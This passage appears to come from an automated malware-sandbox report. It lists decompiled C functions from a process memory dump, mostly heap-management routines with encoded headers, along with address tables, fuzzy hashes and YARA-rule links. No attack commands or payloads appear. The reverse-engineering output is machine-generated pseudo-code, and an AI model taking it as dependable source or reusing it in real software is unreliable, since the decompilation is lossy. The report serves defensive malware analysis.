					_t111 =  *(_t120 + 0x50) ^  *_t80;
					 *_t80 = _t111;
					_t93 = _t111 >> 0x00000010 ^ _t111 >> 0x00000008 ^ _t111;
					_t133 = _t111 >> 0x18 - _t93;
					if(_t111 >> 0x18 != _t93) {
						E1E45FA2B(_t80, _t120, _t80, _t119, _t120, _t133, _t93);
					}
				}
				goto L38;
			}

0x1e44cb59
0x1e44cb5e
0x1e44cb61
0x1e44cb67
0x1e44cb6c
0x1e44ccf9
0x1e44ccfd
0x1e44cd03
0x00000000
0x00000000
0x00000000
0x1e44cb72
0x1e44cb72
0x1e44cb76
0x1e44cb79
0x1e44cb7c
0x1e44cb81
0x1e44cb85
0x1e44cb91
0x1e44cb96
0x1e44cb98
0x1e44cb9f
0x1e44cb9f
0x1e44cb98
0x1e44cba8
0x1e44cbab
0x1e44cbad
0x1e44cbb0
0x1e44cbb3
0x1e44cc48
0x1e44cc4d
0x1e44cc50
0x1e44cc8e
0x1e44cc91
0x1e44cc93
0x1e44cc9d
0x1e44cc9d
0x1e44cca0
0x1e44cca0
0x1e44cca4
0x1e44ccae
0x1e44ccb4
0x1e44ccb4
0x1e44ccb4
0x00000000
0x1e44cca4
0x1e44cc98
0x1e44cc9b
0x00000000
0x00000000
0x00000000
0x1e44cc9b
0x1e44cc52
0x1e44cc54
0x1e44cc78
0x1e44cc78
0x1e44cc7a
0x1e44cc7d
0x1e44cc7f
0x1e44cc81
0x1e44cc86
0x1e44cc86
0x00000000
0x1e44cc86
0x1e44cc5b
0x1e44cc5e
0x1e44cc6a
0x1e44cc71
0x00000000
0x1e44cc71
0x1e44cc64
0x1e44cc68
0x00000000
0x00000000
0x00000000
0x1e44cc68
0x1e44cbb9
0x1e44cbbc
0x1e44cbbf
0x1e44cbc4
0x1e44cc26
0x1e44cc26
0x1e44cc27
0x1e44cc32
0x00000000
0x1e44cc32
0x1e44cbcb
0x1e44cbce
0x00000000
0x00000000
0x1e44cbd0
0x1e44cbd3
0x1e44cbdb
0x1e44cbff
0x1e44cbff
0x1e44cc02
0x1e44cc04
0x1e44cc0b
0x1e44cc11
0x1e44cc11
0x1e44cc19
0x1e44cc1b
0x1e44cc1d
0x00000000
0x1e44cc1d
0x1e44cbdd
0x1e44cbea
0x1e44cbe2
0x1e44cbe4
0x1e44cbe6
0x1e44cc23
0x1e44cbf1
0x1e44cbfa
0x00000000
0x1e44cbfa
0x1e44cbe8
0x1e44cbe8
0x1e44cbef
0x00000000
0x1e44ccb6
0x1e44ccbc
0x1e44ccc4
0x1e44ccc9
0x1e44ccd4
0x1e44ccd8
0x1e44cce4
0x1e44cce9
0x1e44cceb
0x1e44ccf2
0x1e44ccf2
0x1e44cceb
0x00000000

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
Instruction ID: 7db734865cd57e3e3a8217f4acc4892d9ebbc9064743484458f23c355b7fe164
Opcode Fuzzy Hash: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
Instruction Fuzzy Hash: DC519E74B00641DBFB188F65C490A6AB7F7EF89300F38865ED5469B340D771AD42CB59

Uniqueness

Uniqueness Score: -1.00%

Function 1E472B28, Relevance: .1, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1E472B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x1e496110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E1E3C2280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x1e496110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E1E47241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E1E3BFFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E1E473209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E1E46A80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E1E3BFFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E1E46A80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x1e496110; // 0x18e1e984
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}

0x1e472b28
0x1e472b30
0x1e472b35
0x1e472b37
0x1e472b3a
0x1e472b3d
0x1e472b44
0x1e472b4d
0x1e472b4d
0x1e472b50
0x1e472b54
0x1e472bb0
0x1e472bbd
0x1e472be8
0x1e472bef
0x1e472bf4
0x1e472bf7
0x1e472bfa
0x1e472bfd
0x1e472c02
0x1e472c02
0x1e472c0f
0x1e472c13
0x1e472c3b
0x1e472c4a
0x1e472c4f
0x1e472c52
0x1e472c52
0x1e472c59
0x1e472c62
0x1e472c62
0x1e472c69
0x1e472c15
0x1e472c18
0x1e472c19
0x1e472c21
0x1e472c29
0x1e472c2f
0x1e472c2f
0x1e472c29
0x1e472bbf
0x1e472bc2
0x1e472bc3
0x1e472bc9
0x1e472bc9
0x1e472c72
0x1e472c72
0x1e472b56
0x1e472b5c
0x1e472b62
0x1e472b64
0x1e472b72
0x1e472b77
0x1e472ba3
0x1e472ba3
0x1e472ba5
0x1e472baa
0x00000000
0x1e472baa
0x1e472b7e
0x1e472b84
0x1e472b86
0x1e472b97
0x1e472b9c
0x1e472b9e
0x1e472b9e
0x00000000
0x1e472b9e
0x1e472b8b
0x1e472b90
0x00000000
0x00000000
0x1e472b95
0x00000000
0x1e472b95
0x1e472b6b
0x00000000

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7426f7c0ba6ebd951e42982b29c3598c81441f31d984211bd1d2d57c86c341d3
Instruction ID: 44a23216b840eba1021ab447d87e9db57f719fc0c02e50cc14421d5633b9e6e7
Opcode Fuzzy Hash: 7426f7c0ba6ebd951e42982b29c3598c81441f31d984211bd1d2d57c86c341d3
Instruction Fuzzy Hash: CE410BB3E105156FC314CF29C8819EAB7A9EF48A10B018B6EE855D7381D774EE06CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 1E4722AE, Relevance: .1, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1E4722AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				signed char _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				unsigned int* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E1E4721E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x1e38ac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x1e38ac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x1e38ac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x1e38ac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x1e496110; // 0x18e1e984
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x1e496110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E1E3BFFB0(_t77, _t114, _t114);
						}
						_t63 = E1E472FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E1E3C2280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}

0x1e4722b9
0x1e4722c2
0x1e4722c6
0x1e4722c8
0x1e4722d8
0x1e4722e2
0x1e472303
0x1e472314
0x1e472321
0x1e47234a
0x1e47235b
0x1e47236c
0x1e472372
0x1e472376
0x1e47238f
0x1e47238f
0x1e4723b4
0x1e4723c6
0x1e4723c9
0x1e4723cc
0x1e4723cf
0x1e4723cf
0x1e4723e9
0x1e4723ee
0x1e4723f8
0x1e4723fb
0x1e4723fb
0x1e472403
0x1e47240a
0x1e472378
0x1e47237b
0x1e472381
0x1e472385
0x1e472385
0x1e47238d
0x00000000
0x00000000
0x1e47238d
0x1e472376
0x1e472417

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e885e77d02696f62d01261c79eb35b873ddf0e0bce1c0fb53b490fd9751d56f2
Instruction ID: ad9b03e02d4ce8881876fabb58f8f7246c089924273f0ebe406c573eadae0999
Opcode Fuzzy Hash: e885e77d02696f62d01261c79eb35b873ddf0e0bce1c0fb53b490fd9751d56f2
Instruction Fuzzy Hash: 7041E6715043428BC308CF25C8A19BABBE1EF85625F014B5EF4D19B282CF34D44AD7A5

Uniqueness

Uniqueness Score: -1.00%

Function 1E4720A8, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1E4720A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x1e496110; // 0x18e1e984
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x1e496110; // 0x18e1e984
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E1E472E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x1e496110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E1E472E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x1e496110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E1E472E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x1e496110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x1e496110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}

0x1e4720a8
0x1e4720b0
0x1e4720b6
0x1e4720ba
0x1e4720be
0x1e4720c4
0x1e4720cb
0x1e4720db
0x1e4720e4
0x1e4720e7
0x1e4720e9
0x1e4720ef
0x1e4720f1
0x1e4720fe
0x1e472102
0x1e472105
0x1e472105
0x1e472107
0x1e47210d
0x1e472112
0x1e472115
0x1e472120
0x1e472120
0x1e472107
0x1e472126
0x1e472131
0x1e472133
0x1e47213e
0x1e47213e
0x1e472140
0x1e472146
0x1e47214b
0x1e472156
0x1e472156
0x1e472140
0x1e47215f
0x1e472165
0x1e472170
0x1e472172
0x1e47217d
0x1e47217d
0x1e47217f
0x1e472185
0x1e472192
0x1e472192
0x1e47217f
0x1e472170
0x1e472197
0x1e472199
0x1e4721a1
0x1e4721b1
0x1e4721bf
0x1e4721d6
0x1e4721d6
0x1e4721bf
0x1e4721dd
0x1e4721e5

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2408d3c1ca44d824d5cec0eb0655fa06647f8c0aca1712006effb27960f9e468
Instruction ID: 91289e9b3362289ef518821740720981c83df55ef1accae0ccad59135934b566
Opcode Fuzzy Hash: 2408d3c1ca44d824d5cec0eb0655fa06647f8c0aca1712006effb27960f9e468
Instruction Fuzzy Hash: 1E418473E1402A8BCB18CF64C4915BAB3F1FB4870575642BED815AB255DB34BD41CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 1E472D07, Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1E472D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E1E4721E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x1e38ac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x1e38ac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x1e38ac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x1e38ac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x1e38ac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x1e496110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x1e496110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x1e496110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E1E3BB090(_v24, _t91, _v12, _t29);
			}

0x1e472d1f
0x1e472d2c
0x1e472d31
0x1e472d33
0x1e472d42
0x1e472d4b
0x1e472d51
0x1e472d5d
0x1e472d62
0x1e472d6e
0x1e472d71
0x1e472d7d
0x1e472d87
0x1e472d8d
0x1e472d91
0x1e472da5
0x1e472db7
0x1e472dc8
0x1e472dcf
0x1e472dd1
0x1e472dd3
0x1e472dd6
0x1e472ddb
0x1e472ddd
0x00000000
0x1e472ddf
0x1e472df5
0x1e472e0e
0x1e472e12
0x1e472e1a
0x1e472e1c
0x00000000
0x00000000
0x00000000
0x00000000
0x1e472e14
0x1e472e16
0x1e472e22
0x1e472e22
0x1e472e18
0x1e472e18
0x00000000
0x1e472e18
0x1e472e16
0x1e472df7
0x1e472df7
0x1e472dfc
0x1e472e04
0x1e472e06
0x1e472e1e
0x1e472e1e
0x00000000
0x00000000
0x00000000
0x00000000
0x1e472dfe
0x1e472e00
0x1e472e08
0x1e472e08
0x1e472e02
0x1e472e02
0x00000000
0x1e472e02
0x1e472e00
0x1e472dfc
0x00000000
0x1e472df5
0x1e472ddf
0x1e472e26
0x1e472e26
0x1e472e3c

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd0913ada339ce95b672f3707e3b9f36b80f64b2f389d289e17ba6a35c63c5c
Instruction ID: 0c7eb00457a3679edd3c2642be1a297abae6b3a4398d53debf40ae9d7df9a310
Opcode Fuzzy Hash: cfd0913ada339ce95b672f3707e3b9f36b80f64b2f389d289e17ba6a35c63c5c
Instruction Fuzzy Hash: CA4129719041654FC749CB66C8A0AFA7FF1FF85201B1642EBD881EB242DA38D546D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1E472EF7, Relevance: .1, Instructions: 72
COMMONCrypto

Download Yara Rule

C-Code - Quality: 35%

			E1E472EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x1e49d360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E1E3ED0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E1E3ED0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E1E3C2280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x1e49b1e0();
						 *( *(_t106 + 0x30) ^  *0x1e496110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x1e49b1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x1e496110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E1E3BFFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E1E3EB640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x1e38ac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}

0x1e472efc
0x1e472efd
0x1e472eff
0x1e472f03
0x1e472f0a
0x1e472f0c
0x1e472f15
0x1e472fba
0x1e472fbb
0x1e472fc5
0x1e472fcd
0x1e472fcf
0x1e472fd3
0x1e472fd4
0x1e472fd5
0x1e472fd7
0x1e472fda
0x1e472fdb
0x1e472fdd
0x1e472fe0
0x1e472fe2
0x1e472ffc
0x1e472fe4
0x1e472fe4
0x1e472fea
0x1e472fed
0x1e472fef
0x1e472ff6
0x1e472ff1
0x1e472ff1
0x1e472ff1
0x1e472fef
0x1e472fff
0x1e473001
0x1e47301b
0x1e473003
0x1e473003
0x1e47300e
0x1e473015
0x1e473010
0x1e473010
0x1e473010
0x1e473010
0x1e47300e
0x1e47302c
0x1e473035
0x1e47303c
0x1e473046
0x1e47304e
0x1e473056
0x1e47305a
0x1e47305e
0x1e473063
0x1e473067
0x1e47306b
0x1e47306f
0x1e473072
0x1e4730af
0x1e4730b5
0x1e4730c1
0x1e4730c9
0x1e4730c9
0x1e4730c9
0x00000000
0x1e473074
0x1e473081
0x1e473089
0x1e47308b
0x1e47308d
0x1e473093
0x1e47309a
0x1e4730ce
0x1e4730d1
0x1e4730d5
0x1e4730d5
0x1e4730d5
0x1e47308d
0x1e4730db
0x1e4730e6
0x1e4730e7
0x1e4730e8
0x1e4730e9
0x1e4730f3
0x1e472f27
0x1e472f29
0x1e472f2b
0x1e472f2d
0x1e472f36
0x1e472f3d
0x1e472f4c
0x1e472f58
0x1e472fad
0x1e472fb7
0x1e472fb7

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aaafbcb89aa5b542132b5573ca7a3347e7574ab2d4af81911cb69adf12a8bb4
Instruction ID: 518e556eb0e9a2ab83d72e5dfca275952ca86c127d810fbea33c46b1ee6645f2
Opcode Fuzzy Hash: 4aaafbcb89aa5b542132b5573ca7a3347e7574ab2d4af81911cb69adf12a8bb4
Instruction Fuzzy Hash: C121DD712041500FD745CF1AC8E09B6BFF5EFC611275682F6D984EF742C9289417D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1E471FF1, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E1E471FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x1e496110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x1e496110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x1e496110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x1e496110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}

0x1e471ff9
